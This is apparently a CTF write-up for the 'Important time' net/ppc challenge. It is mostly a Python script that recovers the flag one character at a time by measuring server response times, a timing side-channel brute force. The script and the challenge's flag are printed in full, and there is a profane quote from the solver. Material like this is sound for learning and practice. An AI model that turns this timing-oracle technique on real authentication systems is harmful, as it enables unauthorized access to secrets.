# Important time (300)

> Не теряй время, получай флаг!

nc tcp.innoctf.hackforces.com 5000

**Tags**: net, ppc

# Write-up
`Там е****тая система на***` (с) Ruslan

(govno)code by Ruslan
```python
import socket
import string
import threading

w = string.ascii_uppercase + string.digits + string.punctuation

text = 'CTF{D0_N0T_L00SE_UR_T1ME}'

sock = socket.socket()
sock.connect(('tcp.innoctf.hackforces.com', 5000))
sock.recv(16384)
sock.send(text.encode())
sock.send(b'\n')
dt = sock.recv(16384)

print(dt)


def yet(data, system):
    sock = socket.socket()
    sock.connect(('tcp.innoctf.hackforces.com', 5000))
    sock.recv(16384)
    sock.send(data.encode())
    sock.send(b'\n')
    dt = sock.recv(16384)
    n = float(dt.split()[2])
    system[round(n, 1)] = data
    print(round(n, 1), data)


for _ in range(100):
    system = {}
    for i in w:
        while threading.active_count() > 5:
            pass
        threading.Thread(target=yet, args=[text + i + '*', system]).start()
    while len(system) < 2:
        print(system)
    text = system[max(system)][:-1]
    print(system)
```

**Flag**: `CTF{D0_N0T_L00SE_UR_T1ME}`

**Solved by**: `Ruslan`